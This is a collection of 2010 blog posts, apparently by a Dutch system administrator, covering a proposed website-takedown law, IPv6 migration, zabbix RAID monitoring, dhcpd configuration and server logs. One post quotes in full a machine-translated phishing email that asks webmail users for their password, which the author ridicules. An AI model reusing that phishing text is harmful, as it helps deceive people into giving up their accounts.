In de voorgestelde vorm van de wet vallen eigenlijk twee vormen van
controle voordat er informatie ontoegankelijk gemaakt wordt weg:

- In geval van een vordering van het ontoegankelijk maken van gegevens: het
wegvallen van controle vooraf door een rechter.

- En in mindere mate, maar ook niet onbelangrijk: In het geval van een
verzoek om gegevens ontoegankelijk te maken: het wegvallen van de plicht
om uitleg te geven aan een dienstverlener ("Hoster") zoals die er nu in
de Notice and Takedown procedure is

Voor wat betreft de controle door de rechter:

Een rechter kan onafhankelijk afwegingen maken over vermeende
onrechtmatigheid.

Het achteraf schriftelijk kunnen klagen over de vordering van het
ontoegankelijk maken van de gegevens kan volgens mij in sommige situaties
te laat zijn: als justitie besluit het bedrijf KLM 3 dagen geen toegang
te geven tot zijn bedrijfsinformatie is er daarna geen KLM meer om
bezwaar te maken, dan is het bedrijf al failliet. De snelheid van de
informatie maatschappij staat in geen verhouding tot de traagheid van
een bezwaarprocedure.  Justitie zou deze bevoegdheid kunnen misbruiken om
de rollen van aanklager, rechter en beul uit te voeren. Deze bevoegdheid
zal natuurlijk niet zomaar misbruikt worden tegenover een bedrijf als
KLM, maar de potentie is aanwezig dat dissidente meningen in Nederland
makkelijker als "strafbaar" gekwalificeerd worden en daarmee onderdrukt
worden.

Voor wat betreft de uitleg in notice and takedown procedures:

Deze uitleg naar een hoster lijkt mij juist ook een bescherming tegen
justitiele willekeur.  Uit het memorie van toelichting blijkt zelfs de
wens van justitie om de 'tegenwerking' bij Notice and Takedown aanvragen
te kunnen omzeilen door een verplichtende vordering te mogen opleggen
en dwangsommen te kunnen eisen. Volgens mij kan deze 'tegenwerking'
van hosters zowel uit commerciele oogpunten komen (teveel werk e.d.) als
uit een verschil in visie met justitie over de onrechtmatigheid van het
aangeboden materiaal.

Deze twee overwegingen samen, gecombineerd met de achtergrond van zaken
over incorrect optreden van justitie in Nederland die jaren lopen voordat
ze in een onbevredigende uitspraak eindigen zie ik enorme potentie
voor misbruik.

In het "memorie van toelichting Aanpassingswet richtlijn inzake
elektronische handel" (bron:
https://zoek.officielebekendmakingen.nl/kst-28197-3.html ) staat
omschreven:

"De ratio van de regeling is, zoals eerder aangegeven, de vrijheid van
meningsuiting te ondersteunen. Artikel 7 van de Grondwet geeft aan de
overheid de opdracht de vrijheid van meningsuiting te waarborgen en te
stimuleren. Censuur van staatswege dient te worden voorkomen."

Deze wet heeft met de gevraagde aanpassingen zeker de potentie om
misbruikt te worden door justitie voor censuur. En alleen al de
potentie tot misbruik op een manier die ingaat tegen onze Nederlandse
grondwet is voor mij voldoende om het voorstel in zijn huidige vorm
ongewenst te achten.

Koos van den Hout
Utrecht

Weird Al in Amsterdam in December:

Just confirmed – I’m doing my first-ever show in Amsterdam on Dec. 8! http://is.gd/fA3PI

I'm trying to make it work out to go there...

Ingredients: some graphics work to support mp3 attachment download, a reinstall of a computer giving more audio editing capabilities, updates to several scripts and some news which I commented on in text. Now I can add an audio attachment to a newsitem with flashplayer, download options and it will show as attachment in the rss feed.

Reminder: nog 2 dagen voor de Consultatie "wetsvoorstel versterking bestrijding computercriminaliteit" wat justitie vergaande bevoegdheden geeft om zonder rechterlijke controle websites te verwijderen. Of kort door de bocht: censuur uitoefenen. Info: Wetsvoorstel: OM krijgt aan/uit-knop voor websites - Bits of Freedom. Tijd om de Nederlandse wetgever uit te leggen dat de nederlandse grondwet een rechtsstaat bedoelde en geen politiestaat.

ISC dhcpd can do interesting stuff, but some options can be quite obscure. Today we suddenly got flooded by alcatel telephones doing DHCP requests in the wrong VLAN. Probably having to do something with moving phones between buildings with different voice vlans. I don't want them to use up dynamic IPs in a production network so I searched a bit and found DHCP for specific range of mac addresses? - Networking. Simple bit of config:

    if binary-to-ascii (16, 8, "-", substring (hardware, 0, 4)) = "1-0-80-9f" {
        deny booting;
    }

Which will deny those 00:80:9f addresses. The first 1 is for hardware class ethernet.

Reinstalled the home workstation jobs yesterday with Ubuntu desktop. I had to adjust a few things during and after the installation: it has 2 network cards (one on-board at 100 megabit, one pci card at 1000 megabit which is the one actually in use) which left both unconfigured and it boots from a scsi disk while it has an IDE disk (the current hardware is from right before SATA disks) so I had to select a different disk to install the system on and a different disk to install the bootmanager.

But everything worked out nicely, all hardware is recognized. The setup for propetairy drivers came with the suggestion to install the nvidia driver for hardware accelerated video which worked. After the installation I added a few programs I really want to use (thunderbird, gimp, audacity). I had to tweak the sound settings a bit to get the correct default sound settings.

One of the reasons to do the reinstall was to have a good environment for audio editing. I hooked up the usb audio interface and it all works nicely. I will probably have to change the physical setup a few times to make it easier to record voice (a simple radiostudio-like microphone arm might be an idea). Digitizing cassette tape is now easier and I record audio to a disk which is in the backup scheme. Earlier I did audiowork on the laptop and copied the results over to this disk.

Cleaning out the dust bunnies from the system also reduced the noise and the temperature.

In the news: VoIP hacker sentenced to 10 years - The Register and Hacker Gets 10 Years for $1.4 Million Internet Theft - BusinessWeek. From the businessweek article:

Pena was an unauthorized wholesaler of Internet-based phone services who sold more than 10 million minutes at deep discounts to customers, he admitted when he pleaded guilty. He hacked into computer networks such as one owned by IDT, a Newark-based telecommunications company, to route customer calls, he said.

These damages from VoIP fraud make me think there is probably a lot more fraud and resulting damages in those regular SIP scans I notice in the Asterisk server logs.

Secure those servers, audit the logs, set limits for your costs. VoIP infrastructure is a target for attacks and fraud.

Also sent as audio comment to Blue Box VoIP security podcast.

Did some audio work. Wrote a script, recorded the voice and did work on it with audacity, adding a few sound effects from www.freesound.org and used a drum loop from Free-Loops.com.

With the microphone, mixer and USB audio interface I have from the Behringer podcastudio (what a nice composed word) it is quite easy to record my voice (and other audio) in audacity in a good quality (at least when I do not have a cold..).

But adding the drum loop as 'music bed' (music you hear in the background when for example a DJ talks) was harder. It's easy to play with effects and such but the right timing of the envelope changes (changing the volume) in such a music bed is harder, especially when you move other sound effects in time. Searching suggests audacity isn't ideal for this kind of work, but at the moment I can't beat the price of audacity: free! For what I do with audio, that will have to do for now. Just leave room for volume changes in the bed and do it as the last thing when the timing of the rest is good.

Prachtig stukje review:

Voor het installeren is kennis van vreemde talen vereist en ook het goed zijn oplossen van cryptogrammen is een aanbevling. Neem vervolgens een dag vrij en dan maar hopen dat het lukt.

Komt uit Albrecht DR 315 internet radio bij Conrad.

Grr, twitter worm doing the rounds (currently visible as my last tweet :-(( deleted as my last tweet) and I can't get logged in to the mobile interface to delete it.
Ah well, you get what you pay for.

And sometimes the creative part of my brain jumps up and comes up with something visual. I've been working on the possibility of mp3 attachments on this site and in the RSS feed and I had a vision of what an entry with an mp3 attachment should have: a cassette! So I searched for some usable cassette icon artwork and found Free vector music icon graphics including a cassette tape and did some work on it with the Gimp. And now the most recent entry with an mp3 attachment is presented like this: Jingle RTFM!. After a bit of gimp work and css work it looks nice. I think ;)

I wanted to run Ubuntu desktop from the heavy duty boot service to skip the problems with making CDs. There seems to be no full pxeboot environment for Ubuntu desktop but with the recipe from PXE boot Ubuntu -10.04 - LinuxReaders it was easy to set up a pxeboot + nfs environment. It works, I can boot a system to run the ubuntu livecd or prepare for an installation.

Some time ago I wrote a script for the posting of urls via @fridayaftURL on twitter. The script also seems affected by the new authorization system on twitter because I can't post anymore. The weird thing is I thought I checked the return status from the post call, but it never failed before. It does now. I had to update the return status check for this, to make it fail correctly (and not set the urls in the database to 'tweeted').

Implementing OAuth will be something I need to make time for, so for now I'll just stop posting the friday afternoon urls to twitter. Too bad.

The Friday afternoon URL page itself works fine, so find the URLs over there!

I built my first RPM package today. Well ok, I adjusted the specfile and patchfile of an existing RPM package. But now it does what I want and I understood what I was doing.

I needed to write installation instructions for adding servers to zabbix. And the whole configure ; make ; make install ; fix this, fix that, fix ... thing is not very co-worker friendly.

So I did a bit of searching and found Andrew Farley's rpms from a forum post on the zabbix forums: CentOS 5 (and RHEL) RPMs for Zabbix 1.8. I changed a few things, removed the build of server and proxy (not needed in my setup) and started doing runs with rpmbuild. After a few tries (and lots of time for tea waiting for the complete rebuild every time) I had a working setup which would deploy to a server in minutes. A simple 'how to configure and activate' was added in the instructions. And now it saves us work. On to the next project!

In general, having to document something, writing down exactly how something fits together is a great way to start thinking about it, and sometimes finding a lot of room for improving things.

Uit welke automatische vertaler zou dit komen?

Dit bericht is van het de dienstgegevensbestand op het centrum van het
technologiebericht aan alle Nederlandse Webmail rekeningseigenaars en
Gebruikers. Al Nederlandse ISP Webmail wordt onderworpen aan dit
regelmatige onderhoudsprogramma. De toegang tot uw elektronische rekening
Webmail door ons portaal zal voor een periode tijdens deze
onderhoudsperiode beschikbaar zijn.

Wij zullen de onderhoudsdienst in al Nederlands ISP van de Webdienst
gegevensbestand uitvoeren en de e-mailrekeningen voor een betere webmail
hebben toegang tot de online diensten, om het Verkeer van de
berichtlevering van uw webmailrekening te verbeteren. Wij zullen al adres
schrappen van webmailrekeningen dat dit bericht zal ontvangen en zal
weigeren om details te verstrekken om zijn of haar rekening te bevorderen
Webmail om meer ruimte voor nieuwe webmailGebruikers tot stand te brengen.


Om de dienstonderbreking of het losmaken van uw webmailrekening te
vermijden, gelieve te moeten u op dit bericht antwoorden onmiddellijk na
het lezen bevestigend uw e-mailrekeningsdetails met onderstaande
informations.

1. Volledige naam:
2. Ga volledig e-mailadres in:
3. Gebruikersbenaming:
4. Wachtwoord:
5. Bevestig uw huidig wachtwoord:


Het nalaten om dit te doen automatisch, kan uw post maken schrapping van
uw van de server e-mail-gegevensbestand/post gehandicapten rekenschap
geven. zo kunnen wij uw e-mailrekening bevorderen, alstublieft op deze
e-mail antwoorden.

Dank u.
De Beheerder van het Systeem van Webmail

Toch maar even het Reply-To adres geblokkeerd.

Toen ik even keek in de logs van de asterisk demo server zag ik wat (veel) fouten voor de Asterisk metar weerbericht functie. Wat zoeken verder bleek dat het ophalen van metars niet lukte omdat het formaat van de pagina net iets anders is geworden. Scriptje aangepast, en na wat testen werkt het weer allemaal.

En omdat Soesterberg (EHSB) echt definitief geen meteoroloog meer heeft heb ik die toch maar eens vervangen door Eindhoven (EHEH).

I revived the broken Xencluster system again today. I managed to remove the 'clustered' attribute from VolGroup00 which contains the root filesystem. Based on Re: [Linux-cluster] iscsi and clusterd volume group on the redhat linux-cluster mailing list I again tried. I booted from the PLD linux rescue CD which has enough lvm parts. It saw VolGroup00 but would not let me do anything with it because it was clustered. The workaround was to enable lvm clustering with lvmconf --enable-cluster, edit the /etc/lvm/lvm.conf file (on the rescue cd ramdisk) to disable all locking (the dangerous option), locking_type = 0 after which I could disable the 'clustered' bit with vgchange -c n VolGroup00, revert /etc/lvm/lvm.conf to 'normal' and I had access to the volume group again, and a working system.

Things I don't want to happen during my holiday: one member of the Xencluster at work rebooted (which happens once in a while) and won't boot anymore, due to VolGroup00 (containing the root) being in a clustered logical volume which the initrd start scripts don't seem to handle very well. Screengrab of the boot messages and CentOS5 with clustered lvm2: not booting anymore (VolGroup00 not activated) - CentOS forums. Any help is welcome ...

Getting the screengrab was interesting: the system panics as soon as the root can't be remounted and reboots. It being a server class machine most time was spent checking memory, initializing hardware and waiting for booting. But a few seconds the exact messages were visible. So I viewed the right adderview console server with vncviewer and made grabs every second using a small shell script. And result: an understandable error message which helped me research the problem.

Terug van vakantie: twee weken in Spanje. En niet twee weken op het strand gelegen.. maar het nodige gezien van Barcelona en park Montseny.

In ieder geval heeft transavia nog iets ruimere stoelen dan die in World’s Most Cramped Airline Seat to Launch Next Week - Gadget Lab - Wired, maar het scheelt weinig. Het leek me weer alsof luchtvaartmaatschappijen het hele proces van instappen tot en met vliegen zo oncomfortabel mogelijk willen maken als ze maar mee kunnen wegkomen. En luchthavens werken van harte mee met van die leuke regelingen dat je geen flesje water mag meenemen door de security check, maar erachter is wel water te koop voor de hoofdprijs. Terwijl allang bekend is dat die hele vloeistoffen-dreiging overtrokken is en de maatregelen weer teruggedraaid hadden moeten zijn.

Een hoop mooie dingen gezien. Natuurlijk weer een bezoek gebracht aan de 'Temple Expiatori de la Sagrada Família'. We hadden in Barcelona appartementen van Friendly Rentals. Gewoon appartementen in 'woon' straten, niet al te toeristisch. In park Montseny hebben we gelogeerd in het 'hotel rural' La Morera. Heerlijk ver van alles: in het dal was nog een andere lichtbron en 's avonds konden we gewoon sterren kijken. Heel veel sterren kijken.

Goed nieuws van mijn favoriete provider xs4all: 26 augustus 2010 Vanaf vandaag: IPv6 voor iedereen.

Uit het persbericht:

XS4ALL MAAKT ALS EERSTE IPv6 VOOR ALLE KLANTEN BESCHIKBAAR

Vanaf vandaag start XS4ALL officieel met het leveren van IPv6. De huidige internetadressen (IPv4) zullen naar verwachting binnen een jaar op zijn en de provider werkt daarom al geruime tijd aan implementatie van het nieuwe protocol IPv6. Wanneer de wereldwijde voorraad IPv4-adressen straks uitgeput is, kunnen nieuwe verbindingen en diensten alleen via IPv6 op internet worden aangesloten. XS4ALL biedt haar klanten de gelegenheid zich daarop nu al voor te bereiden.

Het inschakelen van IPv6 op een xs4all DSL aansluiting is nu gewoon een kwestie van een vinkje in het servicecentrum. IPv6 nu al voor iedereen mogelijk bij XS4ALL - XS4ALL nieuws

Gefeliciteerd xs4all!

I like nice images, usually photographs I made myself or interesting images from the Transmission Gallery which has a great set of transmission wallpapers.

I collect a few in a directory, and there is an easy way to show these on an X background when you use xscreensaver anyway:

$ xscreensaver-getimage -directory background -root

This will select a random image from directory 'background' and display it on the root window.

When I want to make IPv4-legacy-only services available via IPv6 there are some options: an application-specific proxy like the prolocation ipv6 proxy based on squid. A number of high-profile sites are available this way, including for example:

$ host www.spitsnieuws.nl
www.spitsnieuws.nl is an alias for spitsnieuws.nl.
spitsnieuws.nl has address 81.173.64.62
spitsnieuws.nl has IPv6 address 2a00:d00:ff:131:94:228:131:131
spitsnieuws.nl mail is handled by 100 smtpscan-nl1.telegraaf.nl.
spitsnieuws.nl mail is handled by 100 smtpscan-nl2.telegraaf.nl.

But that is web-only. And with some reloads I can make it show a http 503 proxy error which is not the answer I want to see on a high-profile website like www.spitsniews.nl as a visitor, let alone as the owner of the site or the advertiser.

Something I have mentioned before: if you want to implement IPv6 correctly, give it the same amount of monitoring and care as IPv4. Otherwise you're making yourself hard to reach for IPv6-enabled visitors which may damage either your website image or the image of IPv6. Both are bad.

The other option is not the application proxy but address translation. With IPv6 allocations every IPv6 end-user gets enough address space to map the entire IPv4 Internet. I have been thinking about that option for a while and then I came across NAT is evil - www.me.uk RevK's rants. Not IPv4 NAT as we know it, but NAT64 translating IPv6 address space to IPv4 address space. The trick or treat daemon mentioned in the article is the nameserver part for doing DNS64.

But the hard translating work will need to be done in pTRTd, the Portable Transport Relay Translator Daemon.

The default is dangerous from a firewall perspective: you still set up a proxy for the entire IPv4 address space. But with some serious firewall rules on the IPv6 side (default drop and only allow certain addresses and services). I could see an option to do some experimenting with this at work, very carefully selecting certain outward facing services, setting up the firewall and publishing the AAAA records in DNS.

Yes, NAT is evil. NAT64 is evil too, from the viewpoint of the IPv4 server it hides the entire IPv6 Internet behind one IPv4 address without any headers to indicate what the original address was (which the squid proxy solution does offer). But that is one more incentive to upgrade the service to native IPv6 connectivity.

Bericht van de HCC vandaag:

MagEvents heeft vandaag laten weten dat HME 2010 dit jaar niet doorgaat. HCC!dagen vormden een onderdeel van HME2010. De beurs stond gepland voor 5 tot en met 7 november in de Jaarbeurs Utrecht. Voornaamste reden van het niet doorgaan van het Home Multimedia Event is een combinatie van onvoldoende belangstelling bij exposanten en de verschillende interessegebieden.

Maar misschien komt er weer iets HCC-eigen:

HCC beraadt zich op dit moment op de mogelijkheden om een alternatief evenement aan haar leden te bieden.

Aan de ene kant hoop ik dat er weer iets a la de "oude" HCC dagen komt. Aan de andere kant is dat iets wat door de opkomst van het web minder voor de hand ligt. De zware 'hobbyisten' vinden elkaar in newsgroups en forums over de hele wereld, de koopjesjagers zoeken het hele jaar op websites.

Ooit in een krantebericht de huishoudbeurs voor mannen genoemd wat in 2008 nog door de organisatie van HME2008 is overgenomen gezien Terugblik Multimedia Event 2008.

Volgens mij is het in 2000 misgegaan met de HCC: HCC: Een ANWB voor computergebruikers - archief FEM Business.

Het waait stevig.. let ook op de windvlaggetjes op weather.idefix.net Nederland 2010-08-23 14:00 .. vooral de waarnemingen over zee hebben tot 9 Beaufort! Waarnemingsposten EHKV en EHQE.
Update: Op 15:00 nog meer harde wind, windkracht 10 op EHKV weather.idefix.net Nederland 2010-08-23 15:00.

EHKV = oil platform K14-fa-1c in the Northsea.

Shednet is up

Server and network in the shed, up and running complete with IPv6. It won't get an IP55 rating (being able to deal with a bit of water) but it pings, measures the powerline network throughput and makes pretty graphs of that throughput.

Somehow I found this an interesting sight to photograph. And I like the term Shednet.
Update 2010-08-22: I remembered why I originally got the idea to test a PC in the shed: to test a weather-station in the shed as a preparation for doing something again for project sundial. The "powered by alternative energy" part of that project isn't going to be implemented: solar panels would be really expensive but something really low-power with Linux in a (semi-)outdoor housing would work nicely for a weather station and ntp server.

So the first component is tested: I can get a system running there complete with network. Now to find some time to set up the PC and a weather station and measure temperature and humidity in the shed.

Kom op, wat meer debat over privacy-kwesties zou zeer welkom zijn - Trouw

Inderdaad. De plannen waar naar verwezen worden klinken weer erg als het idee van precrime uit de film Minority Report.

Dat soort plannen heeft de Raad van Korpschefs wel vaker. Gelukkig heeft de Raad van Korpschefs helemaal niets te zeggen over het justitie beleid in Nederland. Al zouden ze dat graag willen dus doen ze soms maar vast alsof.

Maar het is aardig van die Raad dat ze er ons er weer eens op wijzen dat de Nederlandse politie graag verregaand de Nederlandse rechtsbeginsels zou overtreden. Niet alleen verkeersagenten op de weg vinden dat ze de wet alleen hoeven te handhaven en zich er niet aan houden. Rechercheurs grasduinen graag in CIOT gegevens. En ook korpschefs van politie vinden blijkbaar dat de Nederlandse grondwet en rechtsbeginsels niet op hun van toepassing zijn. Alleen is dat op een niveau wat een stuk gevaarlijker is voor de samenleving.

Het laatste nummer van het c't magazine voor computer techniek heeft een mooie advertentie achterop van hetzner hosting waarin ze root servers (in duitsland gebruikte term voor dedicated servers die niet gevirtualiseerd zijn en waar je dus toegang hebt tot de hardware) aanbieden. Met gewoon "IPv6 Running" in de advertentie.

Goed om te zien dat bedrijven die op grote schaal actief zijn op Internet ook IPv6 serieus gaan nemen, het implementeren en er dan ook gewoon mee gaan adverteren.

Binnenkort gaat informatica verhuizen en dat betekend dat we afscheid moeten nemen van het 'museum' met oude computers. We hebben altijd wat modellen oude hardware bewaard (HP, Sun, Cisco, Unicorn) om te kunnen laten zien waar we vroeger mee werkten. Maar dat kan niet langer.. met alle bezuinigings operaties bij de universiteit is 'ruimte' een van de dingen waar momenteel flink gekort wordt in de hoop de financien weer op orde te krijgen. En dus zijn er na een komende verhuizing geen planken meer om de historie op te bewaren en mag het allemaal richting recycling. Dus maar snel wat rondgemailed naar wat misschien geinterreseerde mensen.

Ik heb nu alles gemigreerd naar de native IPv6. Nouja, bijna alles: via rulebased routing worden wat openstaande tcp sockets op tunnel adressen nog afgehandeld via de tunnel. Vooral irc is goed in het langdurig openhouden van tcp sockets. En die verbindingen wil ik natuurlijk niet stukmaken.

Kleine ergernis blijft dat netstat -n numerieke IPv6 adressen blijft afkappen.

With ubuntu 8.04 server on the home server greenblatt I got a daily mail:

Subject: Cron  test -x /usr/sbin/anacron || ( cd / &&          
        run-parts --report /etc/cron.daily )                                    

/etc/cron.daily/logrotate:                                                      
Re-opening all log files                                   
Re-opening all log files                                                        
Re-opening all log files                                               

And I couldn't really find the source. But a google search for logrotate mail 're-opening' helps: It is caused by logrotate and mailman, filed as Bug #244233 in mailman (Ubuntu): “Logrotate is noisy with: Re-opening all log files. The fix is simple: make mailman be quiet in /etc/logrotate.d/mailman. A patch is attached to the ubuntu bug.

Ondertussen heeft de support van epag de IPv6 nameserver records bijgewerkt:

   Server Name: NS2.IDEFIX.NET
   IP Address: 2001:980:14CA:42:0:0:0:694
   IP Address: 82.95.196.202
   Registrar: EPAG DOMAINSERVICES GMBH
   Whois Server: whois.enterprice.net
   Referral URL: http://www.enterprice.net

   Server Name: NS2.VANDENHOUT.COM
   IP Address: 2001:980:14CA:42:0:0:0:694
   IP Address: 82.95.196.202
   Registrar: EPAG DOMAINSERVICES GMBH
   Whois Server: whois.enterprice.net
   Referral URL: http://www.enterprice.net

dus nu heb ik alle nameserver adressen over naar de nieuwe adresreeks. Alle IPv6 adressen in alle DNS zones zijn over, dus nu is het 'afbouwen'. Ik moet voor wat nntp over IPv6 verkeer nog even de 'oude' uitgaande adressen gebruiken maar zodra dat over is zal het verkeer over de IPv6 tunnel minimaal zijn. Niet 0: er staan wat langdurige tcp sockets open. Die laat ik vooral lekker doorlopen, dus het zal nog even duren eer de IPv6 tunnel definitief uit kan.

De 'geschiedenis' van mijn ipv6 tunnel is ook wel leuk:

• Op 25 september 2001 had ik een xs4all aansluiting
• Op 27 september 2001 had ik de adsl tunnel aan de gang .. tunnel 17 van de nu naar schatting ruim 4300.

Native IPv6 over ppp-gebaseerde aansluitingen duurde dus nog bijna 9 jaar. Misschien is de 9e verjaardag een mooi moment voor het afsluiten.

Erik Huizer doet een stevige uitspraak over IPv6 invoering in 'Deel ISP's gaat failliet aan IPv6':

Het zou de voorzitter van de IPv6 Task Force 'niet verbazen' wanneer een aantal ISP's 'op zijn minst klanten op verliezen en op een gegeven moment failliet gaan. Als je als service provider op dit moment nog niet bezig bent met IPv6 dan ben je geen knip voor je neus waard. Dan ben je echt te laat.

Misschien dat er bij wat bedrijven toch iemand wakker schrikt en zich afvraagt hoe de IPv6 voortgang is.

Vandaag was de grote omnummeractie van de xs4all IPv6 proef. De IPv6 range die ik nu thuis gekregen heb is 'stabiel'. Nouja, tot aan verhuizingen en hernummer acties, dus even stabiel als de IPv4 toewijzing en garantie tot aan de bekende deur.

Maar nu ben ik dus alles thuis gaan omnummeren naar de nieuwe IPv6 range. Nog heel wat werk, de IPv6 adressen stonden op heel wat plekken al ingevoerd.

Toch wil ik de 'native' IPv6 gaan gebruiken, dat heeft de toekomst.

Het voordeel van IPv6 is natuurlijk dat je thuis bijna ongelimiteerde aantallen adressen hebt. En dat is bij een beetje leuke setup ook een nadeel. Ik heb maar een extra interface aangemaakt op de server waar alle 'services' IPv6 adressen aanhangen. Aan de ppp interface hangen is niet zo handig: die verdwijnt en verschijnt als de ADSL lijn serieus 'hik' doet en dan zijn alle specifieke bindings ook weer stuk. Er is nu op de server gewoon een eth0.42 waarop alle 'service' IPv6 adressen toegevoegd zijn zijn, zowel de nieuwe als de oude. Alle nieuwe 'service' adressen zijn natuurlijk niet meer in eenzelfde /64 als in gebruik op een andere interface.

Enfin, het belangrijkste:

$ dig +short idefix.net aaaa
2001:980:14ca:42::18

En natuurlijk, via de nieuwe verbinding:

$ ping6 -nc 5 ping6.xs4all.nl
PING ping6.xs4all.nl(2001:888:0:1::666) 56 data bytes
64 bytes from 2001:888:0:1::666: icmp_seq=1 ttl=61 time=28.0 ms
64 bytes from 2001:888:0:1::666: icmp_seq=2 ttl=61 time=28.3 ms
64 bytes from 2001:888:0:1::666: icmp_seq=3 ttl=61 time=17.2 ms
64 bytes from 2001:888:0:1::666: icmp_seq=4 ttl=61 time=17.1 ms
64 bytes from 2001:888:0:1::666: icmp_seq=5 ttl=61 time=17.1 ms

--- ping6.xs4all.nl ping statistics ---
5 packets transmitted, 5 received, 0% packet loss, time 4005ms
rtt min/avg/max/mdev = 17.151/21.600/28.322/5.393 ms

Interresante berichtgeving naar aanleiding van een rapport van Stratix over de glasvezel-aanleg in Nederland. Een mooie opmerking in het Parool:

Een andere opmerkelijke bevinding van de onderzoekers is, dat inwoners van de grote steden in de Randstad weinig trek hebben in glasvezel. Sterker nog: glasfiber is in Nederland voornamelijk een aangelegenheid van kleine gemeenten op het platteland buiten de Randstad.

Amsterdammer wil geen supersnel internet via glasfiber - Het Parool

Hier komt ook weer boven dat kleine plaatsen waar telefoon en kabel-aanbieder (nog) geen snel Internet aanbieden en waar de buren nog met elkaar praten eerder kans maken op glasvezel dan grote steden.

Straks krijgen we een omgekeerde digital divide in Nederland: dan moet je echt in een boerendorp wonen om supersnel Internet te krijgen.

I enhanced the zabbix system monitoring to also work on aacraid based controllers. Google searching found me How to check the health of an Adaptec RAID array which shows that the right command-line tool is nowadays arcconf which can be found at Adaptec support for RAID products. Select the right type and click through a few times where you will find the storage manager downloads (not the drivers!). The latest 'adaptec storage manager' includes 'arcconf'. After installing arcconf produces a lot of output, but the line I am interested in is easy to find:

# /usr/StorMan/arcconf GETCONFIG 1 | grep Defunct
   Defunct disk drive count                 : 0

which is exactly what I want. Again a special UserParameter in zabbix_agentd.conf:

UserParameter=aacraid.okdisk,/etc/zabbix/external/aacraid.okdisk

A script to do the actual work:

#!/bin/sh
# aacraid.okdisk

sudo /usr/StorMan/arcconf GETCONFIG 1 | awk ' /Defunct disk drive count/ { print $6 } '

And a change in sudoers to allow this. Allowing /usr/StorMan/arcconf as is did not work because of the capitals but a more general rule helped. Now I can check for the number of disks with problems and warn accordingly (0 disks with problems is ok, 1 disk is warning, > 1 is disaster).

De adsl snelheid is nu helemaal gezakt. Na eerdere problemen met hikken heb ik weer eens xs4all gebeld. Hun oplossing was nu om de lijn terug te zetten naar een 12 megabit profiel. Dat ging een tijdje goed en leverde een stabiele lijn op maar toen ging het weer mis...

=>:adsl info
Modemstate            :  up 
Operation Mode        :  G.992.5 Annex B
Channel Mode          :  interleaved 
Number of resets      :  6 

Vendor                              Local           Remote   
  Country             :               0f               b5 
  Vendor              :             TMMB             BDCM 
  VendorSpecific      :             0000             ff91 
  StandardRevisionNr  :               00               02 

                                  Downstream        Upstream 
Margin       [dB]     :             17.5              9.0 
Attenuation  [dB]     :             20.5             12.0 
OutputPower  [dBm]    :             10.0             13.0 

Available Bandwidth                 Cells/s           Kbit/s 
  Downstream          :            13389             5677 
  Upstream            :             2426             1029 


Transfer statistics
    Errors 
      Received FEC    :           816402 
      Received CRC    :           222198 
      Received HEC    :             7040 
      Transmitted FEC :                0 
      Transmitted CRC :             8329 
      Transmitted HEC :             8097 

     Near end failures since reset
      Loss of frame:          0 failures 
      Loss of signal:         0 failures 
      Loss of power:          0 failures 
      Errored seconds:     2830 seconds  
     Near end failures last 15 minutes
      Loss of frame:          0 seconds 
      Loss of signal:         0 seconds 
      Loss of power:          0 seconds 
      Errored seconds:        1 seconds 
     Near end failures current day 
      Errored seconds:        4 seconds 
     Near end failures previous day 
      Errored seconds:     2826 seconds 

Minder dan 6000 kilobit, tijd om er weer eens achteraan te zitten. Het lijkt alsof er een verband is met regenbuien, en dan moet er echt eens door KPN naar de lijn gekeken worden...

As part of the work on system monitoring I am looking into monitoring RAID units. The beta-ict department uses a number of raid units and data gets replicated between buildings.

I want a warning when a disk goes down. The 3ware disk controller has a nice webinterface but I can't integrate that (easily..) into zabbix. What I did was install the tw_cli command line utility from the 3ware LSI raid controller site (lookup your type of controller, find 'support and downloads' and you will see cli utils for lots of unix versions), which makes life easy:

# tw_cli show

Ctl   Model        (V)Ports  Drives   Units   NotOpt  RRate   VRate  BBU
------------------------------------------------------------------------
c0    9650SE-16ML  16        15       1       1       1       1      OK

What I want to know is the number of not-optimal disks (yes, indeed one is broken at the moment and needs replacement). That I can monitor in zabbix, when I pick up the value with a script:

#!/bin/sh
# /etc/zabbix/external/3ware.okdisk

sudo /usr/local/sbin/tw_cli show | awk ' /^c0/ { print $6 } '

Root access via sudo which means a line in /etc/sudoers which allows /usr/local/sbin/tw_cli from the zabbix user, and the right setting in zabbix_agentd.conf to bind this script to a user parameter:

UserParameter=3ware.okdisk,/etc/zabbix/external/3ware.okdisk

Now I can program a trigger on the output: 0 is ok, 1 is warning, > 1 is disaster. I added an extra action on the trigger to mail the output of tw_cli '/c0 show' to the admins so we know which disk is broken.

Now to do the same for adaptec (aacraid) based raids.
Update 2011-04-15: We now have a raid unit with a b0rken disk but still in 'optimal' state strangely enough. Updated the script to test for disks reporting something else than 'OK'.

Interesting patterns in the security logs again:

Aug 10 00:19:42 greenblatt sshd[22045]: Bad protocol version identification '\200b\001\003\001' from 207.70.60.20
Aug 10 00:19:43 greenblatt sshd[22071]: Bad protocol version identification '\200b\001\003\001' from 209.19.175.124
Aug 10 00:19:44 greenblatt sshd[22072]: Bad protocol version identification '\200b\001\003\001' from 207.70.47.249
Aug 10 00:19:45 greenblatt sshd[22073]: Bad protocol version identification '\200b\001\003\001' from 207.70.41.212
Aug 10 00:19:45 greenblatt sshd[22074]: Bad protocol version identification '\200b\001\003\001' from 207.70.39.65
Aug 10 00:19:46 greenblatt sshd[22075]: Bad protocol version identification '\200b\001\003\001' from 69.5.238.171
Aug 10 00:19:47 greenblatt sshd[22076]: Bad protocol version identification '\200b\001\003\001' from 206.206.50.92
Aug 10 00:19:48 greenblatt sshd[22078]: Bad protocol version identification '\200b\001\003\001' from 207.70.3.141

Notice the timing. Makes me wonder what is going on.
Update: On twitter by @xs4cso:

Major rise in SSH brute force attacks and complaints overnight. Weak passwords to blame.

source
Update: Whois gives an interesting link between most of those IPs: they are all (but one) in network space owned by solution pro web hosting.

Diversificatie

In de huidige crisis tijd moet je als it-bedrijf wel zoeken naar andere richtingen voor je bedrijf.

After adding surge protection to the ISDN line coming into the asterisk server I went out and got the Trust surge guard PW-3500.

